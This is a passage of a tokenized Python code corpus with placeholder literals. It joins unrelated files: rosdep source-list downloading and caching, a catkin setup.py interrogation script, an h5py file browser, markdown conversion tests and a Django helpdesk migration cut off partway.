self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . tags <EOL> @ property <EOL> def origin ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . origin <EOL> class DataSourceMatcher ( object ) : <EOL> def __init__ ( self , tags ) : <EOL> self . tags = tags <EOL> def matches ( self , rosdep_data_source ) : <EOL> """<STR_LIT>""" <EOL> return not any ( set ( rosdep_data_source . tags ) - set ( self . tags ) ) <EOL> @ staticmethod <EOL> def create_default ( os_override = None ) : <EOL> """<STR_LIT>""" <EOL> distro_name = rospkg . distro . current_distro_codename ( ) <EOL> if os_override is None : <EOL> os_detect = rospkg . os_detect . OsDetect ( ) <EOL> os_name , os_version , os_codename = os_detect . detect_os ( ) <EOL> else : <EOL> os_name , os_codename = os_override <EOL> tags = [ t for t in ( distro_name , os_name , os_codename ) if t ] <EOL> return DataSourceMatcher ( tags ) <EOL> def download_rosdep_data ( url ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f = urlopen ( url , timeout = DOWNLOAD_TIMEOUT ) <EOL> text = f . read ( ) <EOL> f . close ( ) <EOL> data = yaml . safe_load ( text ) <EOL> if type ( data ) != dict : <EOL> raise DownloadFailure ( '<STR_LIT>' % ( url ) ) <EOL> return data <EOL> except ( URLError , httplib . HTTPException ) as e : <EOL> raise DownloadFailure ( str ( e ) + '<STR_LIT>' % url ) <EOL> except yaml . YAMLError as e : <EOL> raise DownloadFailure ( str ( e ) ) <EOL> def download_default_sources_list ( url = DEFAULT_SOURCES_LIST_URL ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f = urlopen ( url , timeout = DOWNLOAD_TIMEOUT ) <EOL> except ( URLError , httplib . HTTPException ) as e : <EOL> raise URLError ( str ( e ) + '<STR_LIT>' % url ) <EOL> data = f . read ( ) . decode ( ) <EOL> f . close ( ) <EOL> if not data : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> parse_sources_data ( data ) <EOL> return data <EOL> def parse_sources_data ( data , origin = '<STR_LIT>' , model = None ) : <EOL> """<STR_LIT>""" <EOL> if model is None : <EOL> model = DataSource <EOL> sources = [ ] <EOL> for line in data . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> splits = line . split ( '<STR_LIT:U+0020>' ) <EOL> if len ( splits ) < <NUM_LIT:2> : <EOL> raise InvalidData ( "<STR_LIT>" % ( line ) , origin = origin ) <EOL> type_ = splits [ <NUM_LIT:0> ] <EOL> url = splits [ <NUM_LIT:1> ] <EOL> tags = splits [ <NUM_LIT:2> : ] <EOL> try : <EOL> sources . append ( model ( type_ , url , tags , origin = origin ) ) <EOL> except ValueError as e : <EOL> raise InvalidData ( "<STR_LIT>" % ( line , e ) , origin = origin ) <EOL> return sources <EOL> def parse_sources_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with open ( filepath , '<STR_LIT:r>' ) as f : <EOL> return parse_sources_data ( f . read ( ) , origin = filepath ) <EOL> except IOError as e : <EOL> raise InvalidData ( "<STR_LIT>" % ( str ( e ) ) , origin = filepath ) <EOL> def parse_sources_list ( sources_list_dir = None ) : <EOL> """<STR_LIT>""" <EOL> if sources_list_dir is None : <EOL> sources_list_dir = get_sources_list_dir ( ) <EOL> sources_list_dirs = get_sources_list_dirs ( sources_list_dir ) <EOL> filelist = [ ] <EOL> for sdir in sources_list_dirs : <EOL> filelist += sorted ( [ os . path . join ( sdir , f ) for f in os . listdir ( sdir ) if f . endswith ( '<STR_LIT>' ) ] ) <EOL> sources_list = [ ] <EOL> for f in filelist : <EOL> sources_list . extend ( parse_sources_file ( f ) ) <EOL> return sources_list <EOL> def _generate_key_from_urls ( urls ) : <EOL> try : <EOL> assert isinstance ( urls , ( list , basestring ) ) <EOL> except NameError : <EOL> assert isinstance ( urls , ( list , str ) ) <EOL> return '<STR_LIT>' . join ( urls if isinstance ( urls , list ) else [ urls ] ) <EOL> def update_sources_list ( sources_list_dir = None , sources_cache_dir = None , <EOL> success_handler = None , error_handler = None ) : <EOL> """<STR_LIT>""" <EOL> if sources_cache_dir is None : <EOL> sources_cache_dir = get_sources_cache_dir ( ) <EOL> sources = parse_sources_list ( sources_list_dir = sources_list_dir ) <EOL> retval = [ ] <EOL> for source in list ( sources ) : <EOL> try : <EOL> if source . type == TYPE_YAML : <EOL> rosdep_data = download_rosdep_data ( source . url ) <EOL> elif source . type == TYPE_GBPDISTRO : <EOL> if not source . tags [ <NUM_LIT:0> ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> print ( '<STR_LIT>' % source . tags [ <NUM_LIT:0> ] ) <EOL> sources . remove ( source ) <EOL> continue <EOL> rosdep_data = download_gbpdistro_as_rosdep_data ( source . url ) <EOL> retval . append ( ( source , write_cache_file ( sources_cache_dir , source . url , rosdep_data ) ) ) <EOL> if success_handler is not None : <EOL> success_handler ( source ) <EOL> except DownloadFailure as e : <EOL> if error_handler is not None : <EOL> error_handler ( source , e ) <EOL> print ( '<STR_LIT>' % get_index_url ( ) ) <EOL> for dist_name in sorted ( get_index ( ) . distributions . keys ( ) ) : <EOL> print ( '<STR_LIT>' % dist_name ) <EOL> rds = RosDistroSource ( dist_name ) <EOL> rosdep_data = get_gbprepo_as_rosdep_data ( dist_name ) <EOL> dist_files = get_index ( ) . distributions [ dist_name ] [ '<STR_LIT>' ] <EOL> key = _generate_key_from_urls ( dist_files ) <EOL> retval . append ( ( rds , write_cache_file ( sources_cache_dir , key , rosdep_data ) ) ) <EOL> sources . append ( rds ) <EOL> if not os . path . exists ( sources_cache_dir ) : <EOL> os . makedirs ( sources_cache_dir ) <EOL> cache_index = os . path . join ( sources_cache_dir , CACHE_INDEX ) <EOL> data = "<STR_LIT>" <EOL> for source in sources : <EOL> url = _generate_key_from_urls ( source . url ) <EOL> data += "<STR_LIT>" % ( url , '<STR_LIT:U+0020>' . join ( source . tags ) ) <EOL> write_atomic ( cache_index , data ) <EOL> return retval <EOL> def load_cached_sources_list ( sources_cache_dir = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if sources_cache_dir is None : <EOL> sources_cache_dir = get_sources_cache_dir ( ) <EOL> cache_index = os . path . join ( sources_cache_dir , '<STR_LIT:index>' ) <EOL> if not os . path . exists ( cache_index ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> return [ ] <EOL> with open ( cache_index , '<STR_LIT:r>' ) as f : <EOL> cache_data = f . read ( ) <EOL> model = cache_data_source_loader ( sources_cache_dir , verbose = verbose ) <EOL> return parse_sources_data ( cache_data , origin = cache_index , model = model ) <EOL> def compute_filename_hash ( key_filenames ) : <EOL> sha_hash = hashlib . sha1 ( ) <EOL> if isinstance ( key_filenames , list ) : <EOL> for key in key_filenames : <EOL> sha_hash . update ( key . encode ( ) ) <EOL> else : <EOL> sha_hash . update ( key_filenames . encode ( ) ) <EOL> return sha_hash . hexdigest ( ) <EOL> def write_cache_file ( source_cache_d , key_filenames , rosdep_data ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( source_cache_d ) : <EOL> os . makedirs ( source_cache_d ) <EOL> key_hash = compute_filename_hash ( key_filenames ) <EOL> filepath = os . path . join ( source_cache_d , key_hash ) <EOL> try : <EOL> write_atomic ( filepath + PICKLE_CACHE_EXT , pickle . dumps ( rosdep_data , - <NUM_LIT:1> ) , True ) <EOL> except OSError as e : <EOL> raise CachePermissionError ( "<STR_LIT>" + str ( e ) ) <EOL> try : <EOL> os . unlink ( filepath ) <EOL> except OSError : <EOL> pass <EOL> return filepath <EOL> def write_atomic ( filepath , data , binary = False ) : <EOL> fd , filepath_tmp = tempfile . mkstemp ( prefix = os . path . basename ( filepath ) + '<STR_LIT>' , dir = os . path . dirname ( filepath ) ) <EOL> if ( binary ) : <EOL> fmode = '<STR_LIT:wb>' <EOL> else : <EOL> fmode = '<STR_LIT:w>' <EOL> with os . fdopen ( fd , fmode ) as f : <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> try : <EOL> os . rename ( filepath_tmp , filepath ) <EOL> except OSError : <EOL> try : <EOL> os . unlink ( filepath ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . rename ( filepath_tmp , filepath ) <EOL> except OSError : <EOL> os . unlink ( filepath_tmp ) <EOL> class SourcesListLoader ( RosdepLoader ) : <EOL> """<STR_LIT>""" <EOL> ALL_VIEW_KEY = '<STR_LIT>' <EOL> def __init__ ( self , sources ) : <EOL> """<STR_LIT>""" <EOL> self . sources = sources <EOL> @ staticmethod <EOL> def create_default ( matcher = None , sources_cache_dir = None , os_override = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if matcher is None : <EOL> matcher = DataSourceMatcher . create_default ( os_override = os_override ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( '<STR_LIT:U+002CU+0020>' . join ( matcher . tags ) ) , file = sys . stderr ) <EOL> sources = load_cached_sources_list ( sources_cache_dir = sources_cache_dir , verbose = verbose ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( len ( sources ) ) , file = sys . stderr ) <EOL> sources = [ x for x in sources if matcher . matches ( x ) ] <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( len ( sources ) ) , file = sys . stderr ) <EOL> return SourcesListLoader ( sources ) <EOL> def load_view ( self , view_name , rosdep_db , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if rosdep_db . is_loaded ( view_name ) : <EOL> return <EOL> source = self . get_source ( view_name ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( view_name ) , file = sys . stderr ) <EOL> view_dependencies = self . get_view_dependencies ( view_name ) <EOL> rosdep_db . set_view_data ( view_name , source . rosdep_data , view_dependencies , view_name ) <EOL> def get_loadable_resources ( self ) : <EOL> return [ ] <EOL> def get_loadable_views ( self ) : <EOL> return [ x . url for x in self . sources ] <EOL> def get_view_dependencies ( self , view_name ) : <EOL> if view_name != SourcesListLoader . ALL_VIEW_KEY : <EOL> if any ( [ x for x in self . sources if view_name == x . url ] ) : <EOL> return [ ] <EOL> return [ x . url for x in self . sources ] <EOL> def get_source ( self , view_name ) : <EOL> matches = [ x for x in self . sources if x . url == view_name ] <EOL> if matches : <EOL> return matches [ <NUM_LIT:0> ] <EOL> else : <EOL> raise rospkg . ResourceNotFound ( view_name ) <EOL> def get_rosdeps ( self , resource_name , implicit = True ) : <EOL> """<STR_LIT>""" <EOL> raise rospkg . ResourceNotFound ( resource_name ) <EOL> def get_view_key ( self , resource_name ) : <EOL> """<STR_LIT>""" <EOL> raise rospkg . ResourceNotFound ( resource_name ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import distutils . core <EOL> try : <EOL> import setuptools <EOL> except ImportError : <EOL> pass <EOL> from argparse import ArgumentParser <EOL> def _get_locations ( pkgs , package_dir ) : <EOL> """<STR_LIT>""" <EOL> locations = { } <EOL> allprefix = package_dir . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for pkg in pkgs : <EOL> parent_location = None <EOL> splits = pkg . split ( '<STR_LIT:.>' ) <EOL> for key_len in range ( len ( splits ) ) : <EOL> key = '<STR_LIT:.>' . join ( splits [ : key_len + <NUM_LIT:1> ] ) <EOL> if key not in locations : <EOL> if key in package_dir : <EOL> locations [ key ] = package_dir [ key ] <EOL> elif parent_location is not None : <EOL> locations [ key ] = os . path . join ( parent_location , splits [ key_len ] ) <EOL> else : <EOL> locations [ key ] = os . path . join ( allprefix , key ) <EOL> parent_location = locations [ key ] <EOL> return locations <EOL> def generate_cmake_file ( package_name , version , scripts , package_dir , pkgs , modules ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' % package_name <EOL> result = [ ] <EOL> result . append ( r'<STR_LIT>' % ( prefix , version ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( scripts ) ) ) <EOL> locations = _get_locations ( pkgs , package_dir ) <EOL> for pkgname , location in locations . items ( ) : <EOL> if not '<STR_LIT:.>' in pkgname : <EOL> continue <EOL> splits = pkgname . split ( '<STR_LIT:.>' ) <EOL> if splits [ <NUM_LIT:1> ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> root_name = splits [ <NUM_LIT:0> ] <EOL> root_location = location <EOL> for _ in range ( len ( splits ) - <NUM_LIT:1> ) : <EOL> root_location = os . path . dirname ( root_location ) <EOL> if root_location != locations [ root_name ] : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % ( pkgname , location , root_name , locations [ root_name ] ) ) <EOL> pkgs = [ p for p in pkgs if '<STR_LIT:.>' not in p ] <EOL> resolved_pkgs = [ ] <EOL> for pkg in pkgs : <EOL> resolved_pkgs += [ locations [ pkg ] ] <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( pkgs ) ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( resolved_pkgs ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) ) ) <EOL> filtered_modules = [ ] <EOL> for modname in modules : <EOL> splits = modname . split ( '<STR_LIT:.>' ) <EOL> equals_package = [ ( '<STR_LIT:.>' . join ( splits [ : - i ] ) in locations ) for i in range ( len ( splits ) ) ] <EOL> if any ( equals_package ) : <EOL> continue <EOL> filtered_modules . append ( modname ) <EOL> module_locations = _get_locations ( filtered_modules , package_dir ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( [ '<STR_LIT>' % m . replace ( '<STR_LIT:.>' , '<STR_LIT:/>' ) for m in filtered_modules ] ) ) ) <EOL> result . append ( r'<STR_LIT>' % ( prefix , '<STR_LIT:;>' . join ( [ module_locations [ m ] for m in filtered_modules ] ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) ) ) <EOL> return result <EOL> def _create_mock_setup_function ( package_name , outfile ) : <EOL> """<STR_LIT>""" <EOL> def setup ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:version>' not in kwargs : <EOL> sys . stderr . write ( "<STR_LIT>" % package_name ) <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> version = kwargs [ '<STR_LIT:version>' ] <EOL> package_dir = kwargs . get ( '<STR_LIT>' , { } ) <EOL> pkgs = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> scripts = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> modules = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> unsupported_args = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> used_unsupported_args = [ arg for arg in unsupported_args if arg in kwargs ] <EOL> if used_unsupported_args : <EOL> sys . stderr . write ( "<STR_LIT>" % ( used_unsupported_args , package_name ) ) <EOL> result = generate_cmake_file ( package_name = package_name , <EOL> version = version , <EOL> scripts = scripts , <EOL> package_dir = package_dir , <EOL> pkgs = pkgs , <EOL> modules = modules ) <EOL> with open ( outfile , '<STR_LIT:w>' ) as out : <EOL> out . write ( '<STR_LIT:\n>' . join ( result ) ) <EOL> return setup <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> os . chdir ( os . path . dirname ( os . path . abspath ( args . setupfile_path ) ) ) <EOL> try : <EOL> fake_setup = _create_mock_setup_function ( package_name = args . package_name , <EOL> outfile = args . outfile ) <EOL> distutils_backup = distutils . core . setup <EOL> distutils . core . setup = fake_setup <EOL> try : <EOL> setuptools_backup = setuptools . setup <EOL> setuptools . setup = fake_setup <EOL> except NameError : <EOL> pass <EOL> with open ( args . setupfile_path , '<STR_LIT:r>' ) as fh : <EOL> local_vars = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : os . path . abspath ( args . setupfile_path ) , <EOL> '<STR_LIT>' : '<STR_LIT:__main__>' , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> exec ( fh . read ( ) , { } , local_vars ) <EOL> finally : <EOL> distutils . core . setup = distutils_backup <EOL> try : <EOL> setuptools . setup = setuptools_backup <EOL> except NameError : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import shutil <EOL> from test . utils import AbstractCatkinWorkspaceTest , TEMP_DIR , rosinstall , create_catkin_workspace <EOL> class AbstractUnstableTest ( AbstractCatkinWorkspaceTest ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , testCaseName , name ) : <EOL> super ( AbstractUnstableTest , self ) . __init__ ( <EOL> testCaseName , os . path . join ( TEMP_DIR , name ) ) <EOL> def setupWorkspaceContents ( self ) : <EOL> rosinstall ( self . workspacedir , <EOL> os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) ) <EOL> create_catkin_workspace ( self . workspacedir ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def delete_build ( self ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isdir ( self . builddir ) : <EOL> shutil . rmtree ( self . builddir ) </s>
<s> """<STR_LIT>""" <EOL> import h5py <EOL> from collections import namedtuple <EOL> import operator <EOL> import os <EOL> ItemInfo = namedtuple ( '<STR_LIT>' , [ '<STR_LIT:path>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def format_size ( num_bytes ) : <EOL> """<STR_LIT>""" <EOL> num_bytes = float ( num_bytes ) <EOL> KiB = <NUM_LIT> <EOL> MiB = KiB * KiB <EOL> GiB = KiB * MiB <EOL> TiB = KiB * GiB <EOL> PiB = KiB * TiB <EOL> EiB = KiB * PiB <EOL> ZiB = KiB * EiB <EOL> YiB = KiB * ZiB <EOL> if num_bytes > YiB : <EOL> output = '<STR_LIT>' % ( num_bytes / YiB ) <EOL> elif num_bytes > ZiB : <EOL> output = '<STR_LIT>' % ( num_bytes / ZiB ) <EOL> elif num_bytes > EiB : <EOL> output = '<STR_LIT>' % ( num_bytes / EiB ) <EOL> elif num_bytes > PiB : <EOL> output = '<STR_LIT>' % ( num_bytes / PiB ) <EOL> elif num_bytes > TiB : <EOL> output = '<STR_LIT>' % ( num_bytes / TiB ) <EOL> elif num_bytes > GiB : <EOL> output = '<STR_LIT>' % ( num_bytes / GiB ) <EOL> elif num_bytes > MiB : <EOL> output = '<STR_LIT>' % ( num_bytes / MiB ) <EOL> elif num_bytes > KiB : <EOL> output = '<STR_LIT>' % ( num_bytes / KiB ) <EOL> else : <EOL> output = '<STR_LIT>' % num_bytes <EOL> return output <EOL> class Item ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file , parent , name , itemtype , ** kwargs ) : <EOL> self . file = file <EOL> self . parent = parent <EOL> self . name = name <EOL> self . itemtype = itemtype <EOL> self . _children = { } <EOL> self . kwargs = kwargs <EOL> parentnm = parent . fullname <EOL> if parentnm . endswith ( '<STR_LIT:/>' ) : <EOL> parentnm = parentnm [ : - <NUM_LIT:1> ] <EOL> self . fullname = '<STR_LIT:/>' . join ( [ parentnm , name ] ) <EOL> def _add_child ( self , name , child ) : <EOL> """<STR_LIT>""" <EOL> self . _children [ name ] = child <EOL> def children ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _children . keys ( ) <EOL> def get ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name in self . _attrs ( ) : <EOL> return self . _attr ( name ) <EOL> if '<STR_LIT:/>' in name : <EOL> parent , child = os . path . split ( name ) <EOL> return self . get ( parent ) . get ( child ) <EOL> else : <EOL> return self . _children . get ( name ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> val = self . get ( name ) <EOL> if val is None : <EOL> val = self . kwargs . get ( name ) <EOL> return val <EOL> def __dir__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . _children . keys ( ) <EOL> d . extend ( self . _attrs ( ) ) <EOL> d . extend ( self . kwargs ) <EOL> return sorted ( d ) <EOL> def item ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . file . f . get ( self . fullname ) <EOL> def __getitem__ ( self , i ) : <EOL> """<STR_LIT>""" <EOL> if self . itemtype == '<STR_LIT>' : <EOL> return self . item ( ) [ i ] <EOL> def _attr ( self , name ) : <EOL> """<STR_LIT>""" <EOL> item = self . item ( ) <EOL> return item . attrs [ name ] <EOL> def _attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return sorted ( self . item ( ) . attrs . keys ( ) ) <EOL> def _get_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . itemtype == '<STR_LIT>' : <EOL> s = self . fullname <EOL> elif self . itemtype == '<STR_LIT>' : <EOL> item = self . file . f . get ( self . fullname ) <EOL> shape , dtype = str ( item . shape ) , str ( item . dtype ) <EOL> try : <EOL> nbytes = item . dtype . itemsize * item . size <EOL> except : <EOL> nbytes = item . dtype . itemsize * item . len ( ) <EOL> s = '<STR_LIT>' . format ( <EOL> self . fullname , shape , dtype , format_size ( nbytes ) ) <EOL> for attr in self . _attrs ( ) : <EOL> val = self . get ( attr ) <EOL> s += '<STR_LIT>' . format ( attr , val ) <EOL> return s <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> repr = self . _get_repr ( ) <EOL> for child in self . _children : <EOL> repr = repr + "<STR_LIT:\n>" <EOL> repr += self . get ( child ) . __repr__ ( ) <EOL> return repr <EOL> class Dataset ( Item ) : <EOL> def __init__ ( self , file , parent , name ) : <EOL> super ( Dataset , self ) . __init__ ( file , parent , name , '<STR_LIT>' ) <EOL> class Group ( Item ) : <EOL> def __init__ ( self , file , parent , name ) : <EOL> super ( Group , self ) . __init__ ( file , parent , name , '<STR_LIT>' ) <EOL> class File ( Item ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename = None ) : <EOL> self . fullname = '<STR_LIT:/>' <EOL> super ( File , self ) . __init__ ( self , self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . filename = filename <EOL> self . f = None <EOL> self . iteminfos = [ ] <EOL> self . open ( ) <EOL> def open ( self , filename = None ) : <EOL> """<STR_LIT>""" <EOL> if filename is None : <EOL> filename = self . filename <EOL> else : <EOL> self . filename = filename <EOL> if self . f is None and filename is not None : <EOL> self . f = h5py . File ( filename , '<STR_LIT:r>' ) <EOL> self . _visit ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . f is not None : <EOL> self . f . close ( ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def __exit__ ( self , type , value , tb ) : <EOL> """<STR_LIT>""" <EOL> self . close ( ) <EOL> def _visit_item ( self , name ) : <EOL> """<STR_LIT>""" <EOL> item = self . f . get ( name ) <EOL> if isinstance ( item , h5py . Dataset ) : <EOL> itemtype = '<STR_LIT>' <EOL> shape , dtype = item . shape , item . dtype <EOL> elif isinstance ( item , h5py . Group ) : <EOL> itemtype = '<STR_LIT>' <EOL> shape , dtype = None , None <EOL> self . iteminfos . append ( ItemInfo ( name , itemtype , shape , dtype ) ) <EOL> if '<STR_LIT:/>' not in name : <EOL> self . _children [ name ] = Item ( self , self , name , itemtype , shape = shape , dtype = dtype ) <EOL> else : <EOL> parentnm , childnm = os . path . split ( name ) <EOL> parent = self . get ( parentnm ) <EOL> child = Item ( self , parent , childnm , itemtype , shape = shape , dtype = dtype ) <EOL> parent . _add_child ( childnm , child ) <EOL> def _visit ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . f is not None : <EOL> self . f . visit ( self . _visit_item ) <EOL> self . iteminfos = sorted ( self . iteminfos , key = operator . itemgetter ( <NUM_LIT:0> ) ) <EOL> return self . iteminfos <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> filename = os . path . realpath ( self . filename ) <EOL> s = '<STR_LIT>' . format ( <EOL> filename , format_size ( os . path . getsize ( filename ) ) ) <EOL> s += super ( File , self ) . __repr__ ( ) <EOL> return s <EOL> def open ( filename ) : <EOL> """<STR_LIT>""" <EOL> return File ( filename ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> filename = '<STR_LIT>' <EOL> if not os . path . exists ( filename ) : <EOL> import create <EOL> with open ( filename ) as f : <EOL> print ( "<STR_LIT>" ) <EOL> print ( f ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( f . MyAttr ) <EOL> print ( f . MyGroup2 ) <EOL> print ( f . MyGroup2 . MyDataset1 [ <NUM_LIT:2> : <NUM_LIT:4> , <NUM_LIT:3> : <NUM_LIT:5> ] ) <EOL> print ( f . MyGroup1 . MyGroup11 . get ( '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> : <NUM_LIT:3> ] ) </s>
<s> """<STR_LIT>""" <EOL> from ... core . format_manager import format_manager , convert <EOL> from ... utils . utils import _diff , _show_outputs <EOL> from . _utils import ( _test_reader , _test_writer , <EOL> _exec_test_file , _read_test_file ) <EOL> def _test_markdown_reader ( basename , ignore_notebook_meta = False ) : <EOL> """<STR_LIT>""" <EOL> converted , expected = _test_reader ( basename , '<STR_LIT>' , <EOL> ignore_notebook_meta ) <EOL> assert converted == expected <EOL> def _test_markdown_writer ( basename ) : <EOL> """<STR_LIT>""" <EOL> converted , expected = _test_writer ( basename , '<STR_LIT>' ) <EOL> assert _diff ( converted , expected ) == '<STR_LIT>' <EOL> def _test_markdown_markdown ( basename ) : <EOL> """<STR_LIT>""" <EOL> contents = _read_test_file ( basename , '<STR_LIT>' ) <EOL> cells = convert ( contents , from_ = '<STR_LIT>' ) <EOL> converted = convert ( cells , to = '<STR_LIT>' ) <EOL> assert _diff ( contents , converted ) == '<STR_LIT>' <EOL> def test_markdown_reader ( ) : <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' , ignore_notebook_meta = False ) <EOL> def test_markdown_writer ( ) : <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> def test_markdown_markdown ( ) : <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> def test_decorator ( ) : <EOL> """<STR_LIT>""" <EOL> markdown = '<STR_LIT:\n>' . join ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> cells = convert ( markdown , from_ = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in cells [ <NUM_LIT:0> ] [ '<STR_LIT:input>' ] <EOL> assert cells [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> markdown_bis = convert ( cells , to = '<STR_LIT>' ) <EOL> assert _diff ( markdown , markdown_bis . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' </s>
<s> from django . apps import AppConfig <EOL> class HelpdeskConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from helpdesk . settings import HAS_TAG_SUPPORT <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> if HAS_TAG_SUPPORT : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> if HAS_TAG_SUPPORT : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' 